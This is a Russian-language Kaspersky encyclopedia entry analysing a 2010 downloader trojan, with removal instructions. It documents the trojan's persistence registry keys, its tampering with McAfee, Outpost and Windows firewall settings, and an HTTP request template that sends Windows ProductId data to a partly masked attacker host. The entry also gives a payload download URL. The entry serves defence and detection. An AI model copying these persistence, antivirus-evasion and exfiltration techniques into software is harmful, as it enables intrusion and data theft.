Russian
Интернет находится в нормальном состоянии, крупных эпидемий и других серьезных инцидентов службой мониторинга «Лаборатории Касперского» не зафиксировано. Уровень опасности: 1

Trojan-Downloader.Win32.Small.kkt

Время детектирования 25 фев 2010 11:10 MSK
Время выпуска обновления 25 фев 2010 16:41 MSK
Описание опубликовано 16 июн 2010 13:44 MSK

Технические детали
Деструктивная активность
Рекомендации по удалению

Технические детали

Троянская программа, которая без ведома пользователя скачивает на компьютер другое программное обеспечение и запускает его на исполнение. Является приложением Windows (PE-EXE файл). Имеет размер 18432 байта. Упакована при помощи Mystic Compressor. Написана на С++.

Инсталляция

После запуска троянец копирует свой оригинальный файл в каталог:

%Documents and Settings%\%Current User%\Application Data\
с одним из следующих имен:
7c7e.exe
5c9c.exe
56612.exe
34.exe
1483.exe
Для автоматического запуска при каждом следующем старте системы троянец добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:
[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Win32load" = %Documents and Settings%\%Current User%\
Application Data\<rnd>
где rnd – одно из имен
7c7e.exe
5c9c.exe
56612.exe
34.exe
1483.exe

Деструктивная активность

Затем троянец собирает системную информацию, а именно получает информацию о логическом диске, идентификатор продукта Windows. Для получения идентификатора продукта ОС, троянец читает значение параметра "ProductId" ключа реестра:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
Далее полученная информация передается в HTTP запросе на сервер злоумышленника. Запрос имеет следующий вид:
GET /l/banner.php? v=<тип_логического_диска>&id=<идентификатор_продукта>
HTTP/1.1
x-type: promake
User-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)
Host: mi***las.com
Также троянец пытается отключить защиту Agnitum Outpost фаервола, путем записи служебной информации в именованный канал:
\\.\pipe\acsipc_server
Изменяет настройки фаервола McAfee
%AllUsersProfile%\Application Data\McAfee\Common Framework\SiteList.xml
Сбрасывает настройки сканера McAfee, изменив значение параметра "AccessProtectionUserRules" в ключе реестра:
[HKLM\Software\McAfee\VSCore\On Access Scanner\BehaviourBlocking]
Добавляет ссылку на свой исполняемый файл в список разрешенных приложений в брандмауэр Windows:
[HKLM\System\CurrentControlSet\Services\SharedAccess\
Parameters\FirewallPolicy
\StandardProfile\AuthorizedApplications\List]
"%Documents and Settings%\%Current User%\Application Data\
<rnd>" = "%
Documents and Settings%\%Current User%\Application
Data\<rnd>:*:Enabled:Win32load"
где rnd – одно из имен
7c7e.exe
5c9c.exe
56612.exe
34.exe
1483.exe
Затем троянец пытается выполнить загрузку вредоносной библиотеки, которая размещается по ссылке:
http://mi***las.com/l/load/hide.dll
и сохраняет ее в каталоге временного хранения файлов текущего пользователя, с именем:
%Temp%\68633.dll
Загруженную библиотеку троянец запускает на выполнение. На момент создания описания ссылки не работали. Далее троянец, в отдельном потоке связывается с сервером злоумышленника и ожидает получения команд:
[update]
[loads]
При поступлении от сервера команды, троянец получает на вход ссылку на файл для скачивания и загружает по ней файл, который сохраняет в каталоге временного хранения файлов текущего пользователя, с именем:
%Temp%\<rnd2>.exe
где rnd2 – случайная цифровая последовательность. Затем загруженный файл запускается на выполнение.


Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. При помощи Диспетчера задач завершить один из троянских процессов:
    7c7e.exe
    5c9c.exe
    56612.exe
    34.exe
    1483.exe
    
  2. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  3. Удалить параметры в ключах реестра (как работать с реестром?):
    [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Win32load" = %Documents and Settings%\%Current User%\
    Application Data\<rnd>

    [HKLM\System\CurrentControlSet\Services\SharedAccess\
    Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "%Documents and Settings%\%Current User%\Application Data\<rnd>
    " = "%Documents and Settings%\%Current User%\Application
    Data\<rnd>:*:Enabled:Win32load"
  4. Удалить все найденные файлы:
    %Temp%\68633.dll
    %Temp%\<rnd2>.exe
    %Documents and Settings%\%Current User%\Application Data\
    7c7e.exe
    %Documents and Settings%\%Current User%\Application Data\
    5c9c.exe
    %Documents and Settings%\%Current User%\Application Data\
    56612.exe
    %Documents and Settings%\%Current User%\Application Data\
    34.exe
    %Documents and Settings%\%Current User%\Application Data\
    1483.exe
    
  5. Восстановить оригинальные настройки установленных фаерволов.
  6. Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).


Bookmark and Share
Закладки
Trojan-Downloader

Вредоносная программа, предназначенная для несанкционированной пользователем загрузки и установки на компьютер-жертву новых версий вредоносных программ, установки троянцев или рекламных систем. Загруженные из интернета программы затем либо запускаются на выполнение, либо регистрируются троянцем на автозагрузку в соответствии с возможностями операционной системы.

Информация об именах и расположении загружаемых программ содержится в коде и данных троянца или скачивается троянцем с «управляющего» интернет-ресурса (обычно, с веб-страницы).

Данный тип вредоносных программ в последнее время стал часто использоваться для первоначального заражения посетителей заражённых веб-страниц, содержащих эксплойты.


Другие модификации

Другие названия

Trojan-Downloader.Win32.Small.kkt («Лаборатория Касперского») также известен как:

  • Mal/FakeAV-BT (Sophos)
  • Trojan.Downloader-89780 (ClamAV)
  • TrojanDownloader:Win32/Wadolin.A (MS(OneCare))
  • Trojan.DownLoad.35952 (DrWeb)
  • Win32/TrojanDownloader.Agent.PAY trojan (Nod32)
  • Trojan.Scar.J (BitDef7)
  • SHeur3.UF (AVG)
  • TR/Dldr.Small.kkt (AVIRA)
  • Downloader (NAV)
  • W32/DLoader.AGTSF (Norman)
  • Trojan-Downloader.Win32.Small.kkt [AVP] (FSecure)
  • TROJ_KRAP.SMEP (TrendMicro)